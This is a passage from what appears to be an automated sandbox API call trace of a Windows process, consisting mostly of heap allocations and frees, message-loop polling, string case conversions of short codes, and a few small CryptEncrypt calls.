HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.797] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0266.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.797] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.797] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0266.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.798] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.798] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.798] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.798] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.798] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.798] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0266.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.799] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.799] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.799] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.799] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.799] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.799] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.800] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.800] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.800] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.800] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.800] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.802] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0266.802] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.802] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0266.802] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.802] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.802] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.802] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.802] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.802] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.803] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.803] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.803] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0266.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.803] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.804] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.804] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.804] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.804] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.804] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.804] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.804] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.805] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.805] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.805] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.805] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.805] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0266.806] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.806] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.806] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.806] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.806] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.807] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.807] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.807] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.808] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.808] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.808] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.808] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.809] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.809] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 